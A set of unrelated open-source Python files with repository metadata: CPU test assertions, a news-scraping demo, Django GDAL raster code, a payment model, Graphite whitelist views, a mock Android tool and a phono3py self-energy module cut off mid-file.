self.assertRegisterEqual(self.MIPS.a4, 0xffffffff, "Unsigned load of negative word failed")
def test_pos_offset(self):
'''Test word store, load at positive offset'''
self.assertRegisterEqual(self.MIPS.a5, 2, "Word store, load at positive offset failed")
def test_neg_offset(self):
'''Test word store, load at negative offset'''
self.assertRegisterEqual(self.MIPS.a6, 1, "Word store, load at negative offset failed")
| {
"content_hash": "57d9a14f79dcb032e4b94e4423233874",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 112,
"avg_line_length": 45.46666666666667,
"alnum_prop": 0.6884164222873901,
"repo_name": "8l/beri",
"id": "676e66e282115718fce883a5f6cc8a11ab85a01e",
"size": "2502",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "cheritest/trunk/tests/mem/test_raw_sw.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Assembly",
"bytes": "1629022"
},
{
"name": "Bluespec",
"bytes": "2336405"
},
{
"name": "C",
"bytes": "1058899"
},
{
"name": "C++",
"bytes": "1864"
},
{
"name": "Groff",
"bytes": "14381"
},
{
"name": "Haskell",
"bytes": "11711"
},
{
"name": "Lex",
"bytes": "2894"
},
{
"name": "Makefile",
"bytes": "242450"
},
{
"name": "Mathematica",
"bytes": "291"
},
{
"name": "Objective-C",
"bytes": "2387"
},
{
"name": "OpenEdge ABL",
"bytes": "568"
},
{
"name": "Perl",
"bytes": "19159"
},
{
"name": "Python",
"bytes": "1491002"
},
{
"name": "Shell",
"bytes": "91130"
},
{
"name": "SystemVerilog",
"bytes": "12058"
},
{
"name": "Tcl",
"bytes": "132818"
},
{
"name": "TeX",
"bytes": "4996"
},
{
"name": "Verilog",
"bytes": "125674"
},
{
"name": "Yacc",
"bytes": "5871"
}
],
"symlink_target": ""
} |
import newspaper
cnn_paper = newspaper.build('http://cnn.com')
# for article in cnn_paper.articles:
# print(article.url)
for category in cnn_paper.category_urls():
print(category)
article = cnn_paper.articles[0]
article.download()
print(article.html)
article.parse()
print(article.authors)
print(article.text)
print(article.top_image)
print(article.movies)
print(article.nlp())
print(article.keywords)
print(article.summary)
| {
"content_hash": "bb0f63be5f0f49c8e76662f9a993f51b",
"timestamp": "",
"source": "github",
"line_count": 21,
"max_line_length": 45,
"avg_line_length": 20.80952380952381,
"alnum_prop": 0.7551487414187643,
"repo_name": "Akagi201/learning-python",
"id": "97f6e3f677d5ff65e3db3980b765c783398daf1d",
"size": "437",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "newspaper/test_newspaper.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "125"
},
{
"name": "CSS",
"bytes": "82315"
},
{
"name": "HTML",
"bytes": "16738"
},
{
"name": "JavaScript",
"bytes": "253132"
},
{
"name": "Jupyter Notebook",
"bytes": "3666"
},
{
"name": "Less",
"bytes": "2022"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "336950"
},
{
"name": "Rich Text Format",
"bytes": "49342"
},
{
"name": "Shell",
"bytes": "4498"
}
],
"symlink_target": ""
} |
import math
from ctypes import byref, c_double, c_int, c_void_p
from django.contrib.gis.gdal.base import GDALBase
from django.contrib.gis.gdal.error import GDALException
from django.contrib.gis.gdal.prototypes import raster as capi
from django.contrib.gis.shortcuts import numpy
from django.utils import six
from django.utils.encoding import force_text
from django.utils.six.moves import range
from .const import GDAL_INTEGER_TYPES, GDAL_PIXEL_TYPES, GDAL_TO_CTYPES
class GDALBand(GDALBase):
"""
Wraps a GDAL raster band, needs to be obtained from a GDALRaster object.
"""
def __init__(self, source, index):
self.source = source
self._ptr = capi.get_ds_raster_band(source._ptr, index)
def _flush(self):
"""
Call the flush method on the Band's parent raster and force a refresh
of the statistics attribute when requested the next time.
"""
self.source._flush()
self._stats_refresh = True
@property
def description(self):
"""
Returns the description string of the band.
"""
return force_text(capi.get_band_description(self._ptr))
@property
def width(self):
"""
Width (X axis) in pixels of the band.
"""
return capi.get_band_xsize(self._ptr)
@property
def height(self):
"""
Height (Y axis) in pixels of the band.
"""
return capi.get_band_ysize(self._ptr)
@property
def pixel_count(self):
"""
Returns the total number of pixels in this band.
"""
return self.width * self.height
_stats_refresh = False
def statistics(self, refresh=False, approximate=False):
"""
Compute statistics on the pixel values of this band.
The return value is a tuple with the following structure:
(minimum, maximum, mean, standard deviation).
If approximate=True, the statistics may be computed based on overviews
or a subset of image tiles.
If refresh=True, the statistics will be computed from the data directly,
and the cache will be updated where applicable.
For empty bands (where all pixel values are nodata), all statistics
values are returned as None.
For raster formats using Persistent Auxiliary Metadata (PAM) services,
the statistics might be cached in an auxiliary file.
"""
# Prepare array with arguments for capi function
smin, smax, smean, sstd = c_double(), c_double(), c_double(), c_double()
stats_args = [
self._ptr, c_int(approximate), byref(smin), byref(smax),
byref(smean), byref(sstd), c_void_p(), c_void_p(),
]
if refresh or self._stats_refresh:
capi.compute_band_statistics(*stats_args)
else:
# Add additional argument to force computation if there is no
# existing PAM file to take the values from.
force = True
stats_args.insert(2, c_int(force))
capi.get_band_statistics(*stats_args)
result = smin.value, smax.value, smean.value, sstd.value
# Check if band is empty (in that case, set all statistics to None)
if any((math.isnan(val) for val in result)):
result = (None, None, None, None)
self._stats_refresh = False
return result
@property
def min(self):
"""
Return the minimum pixel value for this band.
"""
return self.statistics()[0]
@property
def max(self):
"""
Return the maximum pixel value for this band.
"""
return self.statistics()[1]
@property
def mean(self):
"""
Return the mean of all pixel values of this band.
"""
return self.statistics()[2]
@property
def std(self):
"""
Return the standard deviation of all pixel values of this band.
"""
return self.statistics()[3]
@property
def nodata_value(self):
"""
Returns the nodata value for this band, or None if it isn't set.
"""
# Get value and nodata exists flag
nodata_exists = c_int()
value = capi.get_band_nodata_value(self._ptr, nodata_exists)
if not nodata_exists:
value = None
# If the pixeltype is an integer, convert to int
elif self.datatype() in GDAL_INTEGER_TYPES:
value = int(value)
return value
@nodata_value.setter
def nodata_value(self, value):
"""
Sets the nodata value for this band.
"""
if value is None:
if not capi.delete_band_nodata_value:
raise ValueError('GDAL >= 2.1 required to delete nodata values.')
capi.delete_band_nodata_value(self._ptr)
elif not isinstance(value, (int, float)):
raise ValueError('Nodata value must be numeric or None.')
else:
capi.set_band_nodata_value(self._ptr, value)
self._flush()
def datatype(self, as_string=False):
"""
Returns the GDAL Pixel Datatype for this band.
"""
dtype = capi.get_band_datatype(self._ptr)
if as_string:
dtype = GDAL_PIXEL_TYPES[dtype]
return dtype
def data(self, data=None, offset=None, size=None, shape=None, as_memoryview=False):
"""
Reads or writes pixel values for this band. Blocks of data can
be accessed by specifying the width, height and offset of the
desired block. The same specification can be used to update
parts of a raster by providing an array of values.
Allowed input data types are bytes, memoryview, list, tuple, and array.
"""
if not offset:
offset = (0, 0)
if not size:
size = (self.width - offset[0], self.height - offset[1])
if not shape:
shape = size
if any(x <= 0 for x in size):
raise ValueError('Offset too big for this raster.')
if size[0] > self.width or size[1] > self.height:
raise ValueError('Size is larger than raster.')
# Create ctypes type array generator
ctypes_array = GDAL_TO_CTYPES[self.datatype()] * (shape[0] * shape[1])
if data is None:
# Set read mode
access_flag = 0
# Prepare empty ctypes array
data_array = ctypes_array()
else:
# Set write mode
access_flag = 1
# Instantiate ctypes array holding the input data
if isinstance(data, (bytes, six.memoryview)) or (numpy and isinstance(data, numpy.ndarray)):
data_array = ctypes_array.from_buffer_copy(data)
else:
data_array = ctypes_array(*data)
# Access band
capi.band_io(self._ptr, access_flag, offset[0], offset[1],
size[0], size[1], byref(data_array), shape[0],
shape[1], self.datatype(), 0, 0)
# Return data as numpy array if possible, otherwise as list
if data is None:
if as_memoryview:
return memoryview(data_array)
elif numpy:
# reshape() needs a reshape parameter with the height first.
return numpy.frombuffer(
data_array, dtype=numpy.dtype(data_array)
).reshape(tuple(reversed(size)))
else:
return list(data_array)
else:
self._flush()
class BandList(list):
def __init__(self, source):
self.source = source
list.__init__(self)
def __iter__(self):
for idx in range(1, len(self) + 1):
yield GDALBand(self.source, idx)
def __len__(self):
return capi.get_ds_raster_count(self.source._ptr)
def __getitem__(self, index):
try:
return GDALBand(self.source, index + 1)
except GDALException:
raise GDALException('Unable to get band index %d' % index)
| {
"content_hash": "d29ec4c671ac085a789771db0792c346",
"timestamp": "",
"source": "github",
"line_count": 251,
"max_line_length": 104,
"avg_line_length": 32.286852589641434,
"alnum_prop": 0.5844027640671273,
"repo_name": "jscn/django",
"id": "878cc5aa4a660e4e50432fb552b6e2127edeb6cd",
"size": "8104",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "django/contrib/gis/gdal/raster/band.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "54032"
},
{
"name": "HTML",
"bytes": "173202"
},
{
"name": "JavaScript",
"bytes": "247734"
},
{
"name": "Makefile",
"bytes": "125"
},
{
"name": "Python",
"bytes": "11227887"
},
{
"name": "Shell",
"bytes": "809"
},
{
"name": "Smarty",
"bytes": "130"
}
],
"symlink_target": ""
} |
from django.db import models
class OrderTransaction(models.Model):
order_number = models.CharField(max_length=128, db_index=True)
| {
"content_hash": "10cfcfd802a1093a6a04c6b283980ac0",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 66,
"avg_line_length": 22.833333333333332,
"alnum_prop": 0.7664233576642335,
"repo_name": "django-oscar/django-oscar-amazon-payments",
"id": "e8a6fa82750bdfdfcd1b2b6356f4152199606ae9",
"size": "137",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "oscar_amazon_payments/models.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "56183"
}
],
"symlink_target": ""
} |
"""Copyright 2008 Orbitz WorldWide
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import os
import pickle
from random import randint
from django.conf import settings
from graphite.compat import HttpResponse
from graphite.util import unpickle
def add(request):
metrics = set( request.POST['metrics'].split() )
whitelist = load_whitelist()
new_whitelist = whitelist | metrics
save_whitelist(new_whitelist)
return HttpResponse(content_type="text/plain", content="OK")
def remove(request):
metrics = set( request.POST['metrics'].split() )
whitelist = load_whitelist()
new_whitelist = whitelist - metrics
save_whitelist(new_whitelist)
return HttpResponse(content_type="text/plain", content="OK")
def show(request):
whitelist = load_whitelist()
members = '\n'.join( sorted(whitelist) )
return HttpResponse(content_type="text/plain", content=members)
def load_whitelist():
buffer = open(settings.WHITELIST_FILE, 'rb').read()
whitelist = unpickle.loads(buffer)
return whitelist
def save_whitelist(whitelist):
serialized = pickle.dumps(whitelist, protocol=-1) #do this instead of dump() to raise potential exceptions before open()
tmpfile = '%s-%d' % (settings.WHITELIST_FILE, randint(0, 100000))
try:
fh = open(tmpfile, 'wb')
fh.write(serialized)
fh.close()
if os.path.exists(settings.WHITELIST_FILE):
os.unlink(settings.WHITELIST_FILE)
os.rename(tmpfile, settings.WHITELIST_FILE)
finally:
if os.path.exists(tmpfile):
os.unlink(tmpfile)
| {
"content_hash": "4b3aa8a3c85341b4430c643ef9280668",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 122,
"avg_line_length": 33.21666666666667,
"alnum_prop": 0.7420973406924235,
"repo_name": "johnseekins/graphite-web",
"id": "ecdb04059c10c2d51509c0a521e260862a5fef95",
"size": "1993",
"binary": false,
"copies": "8",
"ref": "refs/heads/master",
"path": "webapp/graphite/whitelist/views.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "149965"
},
{
"name": "HTML",
"bytes": "29434"
},
{
"name": "JavaScript",
"bytes": "1677725"
},
{
"name": "Perl",
"bytes": "857"
},
{
"name": "Python",
"bytes": "505683"
},
{
"name": "Ruby",
"bytes": "1950"
},
{
"name": "Shell",
"bytes": "1045"
}
],
"symlink_target": ""
} |
import os
import sys
_SCRIPT_DIR = os.path.dirname(__file__)
_OUTPUT_FILE = os.path.join(_SCRIPT_DIR, 'apkanalyzer.output')
def main():
# Without a proguard mapping file, the last argument is the apk_path.
apk_path = sys.argv[-1]
assert os.path.exists(apk_path), 'Apk does not exist: {}'.format(apk_path)
with open(_OUTPUT_FILE, 'r') as f:
sys.stdout.write(f.read())
if __name__ == '__main__':
main()
| {
"content_hash": "4621388f5ea38fed48fcf10f9bd924d2",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 76,
"avg_line_length": 23.38888888888889,
"alnum_prop": 0.6484560570071259,
"repo_name": "endlessm/chromium-browser",
"id": "79d149a7b2f8ca0913560721ba59723f79f2b262",
"size": "585",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tools/binary_size/libsupersize/testdata/mock_sdk/tools/bin/mock_apkanalyzer.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [],
"symlink_target": ""
} |
import sys
import numpy as np
from phonopy.units import Hbar, EV, THz
from phonopy.phonon.degeneracy import degenerate_sets
from phono3py.phonon3.triplets import get_triplets_integration_weights
from phono3py.phonon.func import bose_einstein
from phono3py.file_IO import (write_gamma_detail_to_hdf5,
write_imag_self_energy_at_grid_point)
def get_imag_self_energy(interaction,
grid_points,
temperatures,
sigmas=None,
frequency_points=None,
frequency_step=None,
num_frequency_points=None,
num_points_in_batch=None,
scattering_event_class=None, # class 1 or 2
write_gamma_detail=False,
return_gamma_detail=False,
output_filename=None,
log_level=0):
"""Imaginary part of self energy at frequency points
Band indices to be calculated at are kept in Interaction instance.
Parameters
----------
interaction : Interaction
Ph-ph interaction.
grid_points : array_like
Grid-point indices where imag-self-energeis are caclculated.
dtype=int, shape=(grid_points,)
temperatures : array_like
Temperatures where imag-self-energies are calculated.
dtype=float, shape=(temperatures,)
sigmas : array_like, optional
A set of sigmas. simgas=[None, ] means to use tetrahedron method,
otherwise smearing method with real positive value of sigma.
For example, sigmas=[None, 0.01, 0.03] is possible. Default is None,
which results in [None, ].
dtype=float, shape=(sigmas,)
frequency_points : array_like, optional
Frequency sampling points. Default is None. In this case,
num_frequency_points or frequency_step is used to generate uniform
frequency sampling points.
dtype=float, shape=(frequency_points,)
frequency_step : float, optional
Uniform pitch of frequency sampling points. Default is None. This
results in using num_frequency_points.
num_frequency_points: int, optional
Number of sampling sampling points to be used instead of
frequency_step. This number includes end points. Default is None,
which gives 201.
num_points_in_batch: int, optional
Number of sampling points in one batch. This is for the frequency
sampling mode and the sampling points are divided into batches.
Lager number provides efficient use of multi-cores but more
memory demanding. Default is None, which give the number of 10.
scattering_event_class : int, optional
Specific choice of scattering event class, 1 or 2 that is specified
1 or 2, respectively. The result is stored in gammas. Therefore
usual gammas are not stored in the variable. Default is None, which
doesn't specify scattering_event_class.
write_gamma_detail : bool, optional
Detailed gammas are written into a file in hdf5. Default is False.
return_gamma_detail : bool, optional
With True, detailed gammas are returned. Default is False.
log_level: int
Log level. Default is 0.
Returns
-------
tuple :
(frequency_points, gammas) are returned. With return_gamma_detail=True,
(frequency_points, gammas, detailed_gammas) are returned.
"""
if sigmas is None:
_sigmas = [None, ]
else:
_sigmas = sigmas
if (interaction.get_phonons()[2] == 0).any():
if log_level:
print("Running harmonic phonon calculations...")
interaction.run_phonon_solver()
mesh = interaction.mesh_numbers
frequencies = interaction.get_phonons()[0]
max_phonon_freq = np.amax(frequencies)
_frequency_points = get_frequency_points(
max_phonon_freq=max_phonon_freq,
sigmas=_sigmas,
frequency_points=frequency_points,
frequency_step=frequency_step,
num_frequency_points=num_frequency_points)
ise = ImagSelfEnergy(
interaction, with_detail=(write_gamma_detail or return_gamma_detail))
gamma = np.zeros(
(len(grid_points), len(_sigmas), len(temperatures),
len(interaction.band_indices), len(_frequency_points)),
dtype='double', order='C')
detailed_gamma = []
for i, gp in enumerate(grid_points):
ise.set_grid_point(gp)
if log_level:
weights = interaction.get_triplets_at_q()[1]
print("------------------- Imaginary part of self energy (%d/%d) "
"-------------------" % (i + 1, len(grid_points)))
print("Grid point: %d" % gp)
print("Number of ir-triplets: "
"%d / %d" % (len(weights), weights.sum()))
ise.run_interaction()
if log_level:
adrs = interaction.grid_address[gp]
q = adrs.astype('double') / mesh
print("q-point: %s" % q)
print("Phonon frequency:")
text = "[ "
for bi, freq in enumerate(frequencies[gp]):
if bi % 6 == 0 and bi != 0:
text += "\n"
text += "%8.4f " % freq
text += "]"
print(text)
sys.stdout.flush()
if write_gamma_detail or return_gamma_detail:
(triplets, weights,
map_triplets, _) = interaction.get_triplets_at_q()
num_band0 = len(interaction.band_indices)
num_band = frequencies.shape[1]
detailed_gamma_at_gp = np.zeros(
(len(_sigmas), len(temperatures), len(_frequency_points),
len(weights), num_band0, num_band, num_band),
dtype='double')
else:
detailed_gamma_at_gp = None
for j, sigma in enumerate(_sigmas):
if log_level:
if sigma:
print("Sigma: %s" % sigma)
else:
print("Tetrahedron method is used for BZ integration.")
ise.set_sigma(sigma)
# Run one by one at frequency points
if detailed_gamma_at_gp is None:
detailed_gamma_at_gp_at_j = None
else:
detailed_gamma_at_gp_at_j = detailed_gamma_at_gp[j]
run_ise_at_frequency_points_batch(
_frequency_points,
ise,
temperatures,
gamma[i, j],
write_gamma_detail=write_gamma_detail,
return_gamma_detail=return_gamma_detail,
detailed_gamma_at_gp=detailed_gamma_at_gp_at_j,
scattering_event_class=scattering_event_class,
nelems_in_batch=num_points_in_batch,
log_level=log_level)
if write_gamma_detail:
full_filename = write_gamma_detail_to_hdf5(
temperatures,
mesh,
gamma_detail=detailed_gamma_at_gp[j],
grid_point=gp,
triplet=triplets,
weight=weights,
triplet_map=map_triplets,
sigma=sigma,
frequency_points=_frequency_points,
filename=output_filename)
if log_level:
print("Contribution of each triplet to imaginary part of "
"self energy is written in\n\"%s\"." % full_filename)
if return_gamma_detail:
detailed_gamma.append(detailed_gamma_at_gp)
if return_gamma_detail:
return _frequency_points, gamma, detailed_gamma
else:
return _frequency_points, gamma
def get_frequency_points(max_phonon_freq=None,
sigmas=None,
frequency_points=None,
frequency_step=None,
num_frequency_points=None):
if frequency_points is None:
if sigmas is not None:
sigma_vals = [sigma for sigma in sigmas if sigma is not None]
else:
sigma_vals = []
if sigma_vals:
fmax = max_phonon_freq * 2 + np.max(sigma_vals) * 4
else:
fmax = max_phonon_freq * 2
fmax *= 1.005
fmin = 0
_frequency_points = _sample_frequency_points(
fmin,
fmax,
frequency_step=frequency_step,
num_frequency_points=num_frequency_points)
else:
_frequency_points = np.array(frequency_points, dtype='double')
return _frequency_points
def _sample_frequency_points(f_min,
f_max,
frequency_step=None,
num_frequency_points=None):
if num_frequency_points is None:
if frequency_step is not None:
frequency_points = np.arange(
f_min, f_max, frequency_step, dtype='double')
else:
frequency_points = np.array(np.linspace(
f_min, f_max, 201), dtype='double')
else:
frequency_points = np.array(np.linspace(
f_min, f_max, num_frequency_points), dtype='double')
return frequency_points
def write_imag_self_energy(imag_self_energy,
mesh,
grid_points,
band_indices,
frequency_points,
temperatures,
sigmas,
scattering_event_class=None,
output_filename=None,
is_mesh_symmetry=True,
log_level=0):
for gp, ise_sigmas in zip(grid_points, imag_self_energy):
for sigma, ise_temps in zip(sigmas, ise_sigmas):
for t, ise in zip(temperatures, ise_temps):
for i, bi in enumerate(band_indices):
pos = 0
for j in range(i):
pos += len(band_indices[j])
filename = write_imag_self_energy_at_grid_point(
gp,
bi,
mesh,
frequency_points,
ise[pos:(pos + len(bi))].sum(axis=0) / len(bi),
sigma=sigma,
temperature=t,
scattering_event_class=scattering_event_class,
filename=output_filename,
is_mesh_symmetry=is_mesh_symmetry)
if log_level:
print("Imaginary parts of self-energies were "
"written to \"%s\"." % filename)
def average_by_degeneracy(imag_self_energy, band_indices, freqs_at_gp):
deg_sets = degenerate_sets(freqs_at_gp)
imag_se = np.zeros_like(imag_self_energy)
for dset in deg_sets:
bi_set = []
for i, bi in enumerate(band_indices):
if bi in dset:
bi_set.append(i)
for i in bi_set:
if imag_self_energy.ndim == 1:
imag_se[i] = (imag_self_energy[bi_set].sum() /
len(bi_set))
else:
imag_se[:, i] = (
imag_self_energy[:, bi_set].sum(axis=1) /
len(bi_set))
return imag_se
class ImagSelfEnergy(object):
def __init__(self,
interaction,
frequency_points=None,
temperature=None,
sigma=None,
sigma_cutoff=None,
with_detail=False,
unit_conversion=None,
lang='C'):
self._pp = interaction
self._sigma = None
self.set_sigma(sigma, sigma_cutoff=sigma_cutoff)
self._temperature = None
self.set_temperature(temperature)
self._frequency_points = None
self.set_frequency_points(frequency_points)
self._grid_point = None
self._lang = lang
self._imag_self_energy = None
self._detailed_imag_self_energy = None
self._pp_strength = None
self._frequencies = None
self._triplets_at_q = None
self._weights_at_q = None
self._with_detail = with_detail
self._unit_conversion = None
self._cutoff_frequency = interaction.cutoff_frequency
self._g = None # integration weights
self._g_zero = None # Necessary elements of interaction strength
self._g_zero_frequency_points = None
self._g_zero_zeros = None # always zeros for frequency sampling mode
self._mesh = self._pp.mesh_numbers
self._is_collision_matrix = False
# Unit to THz of Gamma
if unit_conversion is None:
self._unit_conversion = (18 * np.pi / (Hbar * EV) ** 2
/ (2 * np.pi * THz) ** 2
* EV ** 2)
else:
self._unit_conversion = unit_conversion
def run(self):
if self._pp_strength is None:
self.run_interaction()
num_band0 = self._pp_strength.shape[1]
if self._frequency_points is None:
self._imag_self_energy = np.zeros(num_band0, dtype='double')
if self._with_detail:
self._detailed_imag_self_energy = np.empty_like(
self._pp_strength)
self._detailed_imag_self_energy[:] = 0
self._ise_N = np.zeros_like(self._imag_self_energy)
self._ise_U = np.zeros_like(self._imag_self_energy)
self._run_with_band_indices()
else:
self._imag_self_energy = np.zeros(
(len(self._frequency_points), num_band0),
order='C', dtype='double')
if self._with_detail:
self._detailed_imag_self_energy = np.zeros(
(len(self._frequency_points),) + self._pp_strength.shape,
order='C', dtype='double')
self._ise_N = np.zeros_like(self._imag_self_energy)
self._ise_U = np.zeros_like(self._imag_self_energy)
self._run_with_frequency_points()
def run_interaction(self, is_full_pp=True):
if is_full_pp or self._frequency_points is not None:
self._pp.run(lang=self._lang)
else:
self._pp.run(lang=self._lang, g_zero=self._g_zero)
self._pp_strength = self._pp.interaction_strength
def set_integration_weights(self, scattering_event_class=None):
if self._frequency_points is None:
bi = self._pp.band_indices
f_points = self._frequencies[self._grid_point][bi]
else:
f_points = self._frequency_points
self._g, _g_zero = get_triplets_integration_weights(
self._pp,
np.array(f_points, dtype='double'),
self._sigma,
self._sigma_cutoff,
is_collision_matrix=self._is_collision_matrix)
if self._frequency_points is None:
self._g_zero = _g_zero
else:
# g_zero feature can not be used in frequency sampling mode.
# zero values of the following array shape is used in C-routine.
# shape = [num_triplets, num_band0, num_band, num_band]
shape = list(self._g.shape[1:])
shape[1] = len(self._pp.band_indices)
self._g_zero_zeros = np.zeros(shape=shape, dtype='byte', order='C')
self._g_zero_frequency_points = _g_zero
if scattering_event_class == 1 or scattering_event_class == 2:
self._g[scattering_event_class - 1] = 0
def get_imag_self_energy(self):
if self._cutoff_frequency is None:
return self._imag_self_energy
else:
return self._average_by_degeneracy(self._imag_self_energy)
def get_imag_self_energy_N_and_U(self):
if self._cutoff_frequency is None:
return self._ise_N, self._ise_U
else:
return (self._average_by_degeneracy(self._ise_N),
self._average_by_degeneracy(self._ise_U))
def get_detailed_imag_self_energy(self):
return self._detailed_imag_self_energy
def get_integration_weights(self):
return self._g, self._g_zero
def get_unit_conversion_factor(self):
return self._unit_conversion
def set_grid_point(self, grid_point=None, stores_triplets_map=False):
if grid_point is None:
self._grid_point = None
else:
self._pp.set_grid_point(grid_point,
stores_triplets_map=stores_triplets_map)
self._pp_strength = None
(self._triplets_at_q,
self._weights_at_q) = self._pp.get_triplets_at_q()[:2]
self._grid_point = grid_point
self._frequencies, self._eigenvectors, _ = self._pp.get_phonons()
def set_sigma(self, sigma, sigma_cutoff=None):
if sigma is None:
self._sigma = None
else:
self._sigma = float(sigma)
if sigma_cutoff is None:
self._sigma_cutoff = None
else:
self._sigma_cutoff = float(sigma_cutoff)
self.delete_integration_weights()
def set_frequency_points(self, frequency_points):
if frequency_points is None:
self._frequency_points = None
else:
self._frequency_points = np.array(frequency_points, dtype='double')
def set_temperature(self, temperature):
if temperature is None:
self._temperature = None
else:
self._temperature = float(temperature)
def set_averaged_pp_interaction(self, ave_pp):
num_triplets = len(self._triplets_at_q)
num_band = self._pp.get_primitive().get_number_of_atoms() * 3
num_grid = np.prod(self._mesh)
bi = self._pp.get_band_indices()
self._pp_strength = np.zeros(
(num_triplets, len(bi), num_band, num_band), dtype='double')
for i, v_ave in enumerate(ave_pp):
self._pp_strength[:, i, :, :] = v_ave / num_grid
def set_interaction_strength(self, pp_strength):
self._pp_strength = pp_strength
self._pp.set_interaction_strength(pp_strength, g_zero=self._g_zero)
def delete_integration_weights(self):
self._g = None
self._g_zero = None
self._pp_strength = None
def _run_with_band_indices(self):
if self._g is not None:
if self._lang == 'C':
if self._with_detail:
# self._detailed_imag_self_energy.shape =
# (num_triplets, num_band0, num_band, num_band)
# self._imag_self_energy is also set.
self._run_c_detailed_with_band_indices_with_g()
else:
# self._imag_self_energy.shape = (num_band0,)
self._run_c_with_band_indices_with_g()
else:
print("Running into _run_py_with_band_indices_with_g()")
print("This routine is super slow and only for the test.")
self._run_py_with_band_indices_with_g()
else:
print("get_triplets_integration_weights must be executed "
"before calling this method.")
import sys
sys.exit(1)
def _run_with_frequency_points(self):
if self._g is not None:
if self._lang == 'C':
if self._with_detail:
self._run_c_detailed_with_frequency_points_with_g()
else:
self._run_c_with_frequency_points_with_g()
else:
print("Running into _run_py_with_frequency_points_with_g()")
print("This routine is super slow and only for the test.")
self._run_py_with_frequency_points_with_g()
else:
print("get_triplets_integration_weights must be executed "
"before calling this method.")
import sys
sys.exit(1)
def _run_c_with_band_indices_with_g(self):
import phono3py._phono3py as phono3c
if self._g_zero is None:
_g_zero = np.zeros(self._pp_strength.shape,
dtype='byte', order='C')
else:
_g_zero = self._g_zero
phono3c.imag_self_energy_with_g(self._imag_self_energy,
self._pp_strength,
self._triplets_at_q,
self._weights_at_q,
self._frequencies,
self._temperature,
self._g,
_g_zero,
self._cutoff_frequency,
-1)
self._imag_self_energy *= self._unit_conversion
def _run_c_detailed_with_band_indices_with_g(self):
import phono3py._phono3py as phono3c
if self._g_zero is None:
_g_zero = np.zeros(self._pp_strength.shape,
dtype='byte', order='C')
else:
_g_zero = self._g_zero
phono3c.detailed_imag_self_energy_with_g(
self._detailed_imag_self_energy,
self._ise_N, # Normal
self._ise_U, # Umklapp
self._pp_strength,
self._triplets_at_q,
self._weights_at_q,
self._pp.get_grid_address(),
self._frequencies,
self._temperature,
self._g,
_g_zero,
self._cutoff_frequency)
self._detailed_imag_self_energy *= self._unit_conversion
self._ise_N *= self._unit_conversion
self._ise_U *= self._unit_conversion
self._imag_self_energy = self._ise_N + self._ise_U
def _run_c_with_frequency_points_with_g(self):
import phono3py._phono3py as phono3c
num_band0 = self._pp_strength.shape[1]
ise_at_f = np.zeros(num_band0, dtype='double')
for i in range(len(self._frequency_points)):
phono3c.imag_self_energy_with_g(ise_at_f,
self._pp_strength,
self._triplets_at_q,
self._weights_at_q,
self._frequencies,
self._temperature,
self._g,
self._g_zero_frequency_points,
self._cutoff_frequency,
i)
self._imag_self_energy[i] = ise_at_f
self._imag_self_energy *= self._unit_conversion
def _run_c_detailed_with_frequency_points_with_g(self):
import phono3py._phono3py as phono3c
num_band0 = self._pp_strength.shape[1]
g_shape = list(self._g.shape)
g_shape[2] = num_band0
g = np.zeros((2,) + self._pp_strength.shape, order='C', dtype='double')
detailed_ise_at_f = np.zeros(
self._detailed_imag_self_energy.shape[1:5],
order='C', dtype='double')
ise_at_f_N = np.zeros(num_band0, dtype='double')
ise_at_f_U = np.zeros(num_band0, dtype='double')
_g_zero = np.zeros(g_shape, dtype='byte', order='C')
for i in range(len(self._frequency_points)):
for j in range(g.shape[2]):
g[:, :, j, :, :] = self._g[:, :, i, :, :]
phono3c.detailed_imag_self_energy_with_g(
detailed_ise_at_f,
ise_at_f_N,
ise_at_f_U,
self._pp_strength,
self._triplets_at_q,
self._weights_at_q,
self._pp.grid_address,
self._frequencies,
self._temperature,
g,
_g_zero,
self._cutoff_frequency)
self._detailed_imag_self_energy[i] = (detailed_ise_at_f *
self._unit_conversion)
self._ise_N[i] = ise_at_f_N * self._unit_conversion
self._ise_U[i] = ise_at_f_U * self._unit_conversion
self._imag_self_energy[i] = self._ise_N[i] + self._ise_U[i]
def _run_py_with_band_indices_with_g(self):
if self._temperature > 0:
self._ise_thm_with_band_indices()
else:
self._ise_thm_with_band_indices_0K()
def _ise_thm_with_band_indices(self):
freqs = self._frequencies[self._triplets_at_q[:, [1, 2]]]
freqs = np.where(freqs > self._cutoff_frequency, freqs, 1)
n = bose_einstein(freqs, self._temperature)
for i, (tp, w, interaction) in enumerate(zip(self._triplets_at_q,
self._weights_at_q,
self._pp_strength)):
for j, k in list(np.ndindex(interaction.shape[1:])):
f1 = self._frequencies[tp[1]][j]
f2 = self._frequencies[tp[2]][k]
if (f1 > self._cutoff_frequency and
f2 > self._cutoff_frequency):
n2 = n[i, 0, j]
n3 = n[i, 1, k]
g1 = self._g[0, i, :, j, k]
g2_g3 = self._g[1, i, :, j, k] # g2 - g3
self._imag_self_energy[:] += (
(n2 + n3 + 1) * g1 +
(n2 - n3) * (g2_g3)) * interaction[:, j, k] * w
self._imag_self_energy *= self._unit_conversion
def _ise_thm_with_band_indices_0K(self):
